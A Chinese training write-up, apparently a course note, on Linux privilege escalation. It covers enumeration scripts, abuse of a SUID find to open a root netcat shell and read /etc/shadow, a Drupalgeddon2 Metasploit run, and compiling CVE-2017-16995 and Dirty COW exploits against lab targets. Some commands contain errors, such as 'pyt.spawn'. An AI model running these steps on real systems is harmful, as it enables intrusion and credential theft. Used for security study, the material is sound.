系统相关
首页 > 系统相关> > 63:权限提升-Linux脏牛内核漏洞&SUID&信息收集

63:权限提升-Linux脏牛内核漏洞&SUID&信息收集

作者:互联网

63:权限提升-Linux脏牛内核漏洞&SUID&信息收集

 

思维导图

本课重点

案例1:linux提权自动化脚本利用-4个脚本

两个信息收集:LinEnum,linuxprivchecker
两个漏洞探针:linux-exploit-suggester,linux-exploit-suggester2  ==》搜集suid、内核漏洞提权等漏洞

信息收集/漏洞探针主要关注点:SUID,定时任务,可能漏洞,第三方服务应用等

1、LinEnum——Linux枚举及权限提升检查工具

用法

1 2 3 4 脚本先上传到目标服务器/tmp目录下(/tmp目录是临时目录,一般是可读写可执行的) cd /tmp chmod +x LinEnum.sh ./LinEnum.sh

主要检测以下几个大类的信息

参考:https://github.com/rebootuser/LinEnum

2、Linuxprivchecker——Linux 权限提升检查脚本

用法:python linuxprivchecker.py

参考:https://github.com/sleventyeleven/linuxprivchecker

3、linux-exploit-suggester——Linux 提权审计工具

用法

1 2 3 4 脚本先上传到目标服务器/tmp目录下 cd /tmp chmod +x linux-exploit-suggester.sh ./linux-exploit-suggester.sh

会检测到当前系统可能存在的漏洞,返回信息比较多,存在误报

参考:https://github.com/mzet-/linux-exploit-suggester

4、linux-exploit-suggester-2

用法:perl linux-exploit-suggester-2.pl

返回信息相对精简,误报几率相对少

参考:https://github.com/jondonas/linux-exploit-suggester-2

案例2:linux提权suid配合脚本演示-Aliyun

漏洞成因:chmod u+s给与了suid、chmod u-s删除了suid

本来是普通用户执行普通程序,但是一旦给了程序suid权限,程序在运行中就会以root 权限执行,从而提升权限。

举例:test.sh原来的权限是-rwxr-xr-x,当执行chmod u+s test.sh命令后,它的权限就会变成-rwsr-xr-x。此时,即使你用普通用户身份运行test.sh文件,实际上它却是以root权限运行的。

提权过程:探针是否有SUID(手工或脚本)-特定SUID利用-利用成功-GG

参考:https://pentestlab.blog/2017/09/25/suid-executables/

SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。

已知的可用来提权的程序如下:

  1. nmap
  2. vim
  3. find
  4. bash
  5. more
  6. less
  7. nano
  8. cp

<1>使用冰蝎,添加后门。msf+冰蝎配合反弹shell

<2>反弹成功,取得一个web权限

<3>探针是否有SUID(手工或脚本)。两种方法:脚本或者手工。

方法1:脚本。上传LinEnum.sh文件并执行,发现了一些suid文件,并从中找到了可以用于提权的find。由于find被配置为使用 SUID 权限运行,那么所有通过 find 执行的命令都将以 root 身份执行。

方法2:手工。有3条命令

1 2 3 4 #以下命令将尝试查找具有root权限的SUID的文件,不同系统适用于不同的命令,一个一个试 find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000-print2>/dev/null find / -user root -perm -4000-exec ls -ldb {} \;

<4>执行以下命令,确认以root身份运行。即 当我们使用 find pentestlab -exec <命令> \;  的形式运行命令时,使用的是root身份。

1 2 touch pentestlab find pentestlab -exec whoami \;
==》suid提权的精髓就是这两条了!!!

<5>接下来,执行以下命令,以root身份反弹shell。

1 find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;

然后本地连接端口,就会接收到反弹root shell,提权成功。

1 2 3 netcat 192.168.1.189 5555 id cat /etc/shadow

案例3:linux提权本地配合内核漏洞演示-Mozhe-本地提权==》和windows利用内核溢出漏洞提权本质一样

提权过程:连接-获取可利用漏洞-下载并上传exp-编译exp-给权限执行-GG

<1>这里使用的演示环境为墨者学院的Ubuntu 16.04漏洞复现(CVE-2017-16995)演示环境。

连接上去之后,id查看hack用户的uid为1001,属于普通用户。

<2>上传漏洞探针linux-exploit-suggester2并执行,发现了4个可能被利用的漏洞。

<3>尝试利用漏洞CVE-2017-16995。

打开https://www.exploit-db.com/exploits/45010可以查看漏洞利用详情。

下载exp:https://github.com/Jewel591/Privilege-Escalation

上传 45010.c 到目标机器上进行编译,提权成功。

1 2 3 4 gcc 45010.c -o 45010 chmod +x 45010 ./45010 id

案例4:linux提权脏牛内核漏洞演示-Vulnhub,Aliyun

内核提权整个过程:vulnhub靶机-探针目标-CMS漏洞利用-脚本探针提权漏洞-利用内核提权-GG

内核漏洞提权过程:寻可用-下载exp-上传exp到/tmp-编译exp-执行(无权限用chmod)

<1>下载vulnhub靶机并在本地安装,安装后发现无密码没法登录。


<2>探针目标

打开kali,ifconfig找到自己的IP为192.168.76.132。

扫描同网段的IP地址,扫描出来一个80端口

1 nmap 192.168.76.0/24

打开看一下,感觉可能有问题

然后对80端口所在的192.168.76.141目标IP进行全端口扫描,又扫描出来一个1898端口。

1 nmap -p1-65535 192.168.76.141

打开看一下,发现是一个web入口。

拉到页面最下方,发现一行字:Powered by Drupal

<3>CMS漏洞利用

打开msf,搜索Drupal,发现了一些漏洞利用。找一个脚本,尝试利用一下

1 2 3 4 5 search drupal use exploit/unix/webapp/drupalgeddon2 set lhost 192.168.76.141 set lport 1898 exploit

成功拿到web权限

<4>脚本探针提权漏洞+利用内核提权

上传一个漏洞探针脚本linux-exploit-suggester

执行脚本 探针一下,检测出一个脏牛漏洞。

可以直接下载相关exp(缺点是下载后文件名字就是40611,需要手动修改后缀进行后续的执行)

这里我们从GitHub上下载一个exp,上传exp到目标服务器,编译,执行,成功修改root密码。

1 2 3 4 5 6 //exp下载地址:https://github.com/gbonacini/CVE-2016-5195   upload /tmp/40837.cpp /tmp/40837.cpp g++ -Wall -pedantic -o2 -std=c++11 -pthread -o dcow 40837.cpp -lutil python -c 'import pty;pyt.spawn("/bin/bash")' ./dcow

接下来就可以输入用户名密码登录,拿到flag。

<4>尝试在阿里云上利用脏牛漏洞exp提权,失败。(原因应该是内核版本已升级)

其他相关优秀资源:权限提升-linux提权手法总结.pdf(黑白天实验室总结)

标签:漏洞,SUID,提权,exploit,63,脏牛,linux,权限,root
来源: https://www.cnblogs.com/bonelee/p/15866010.html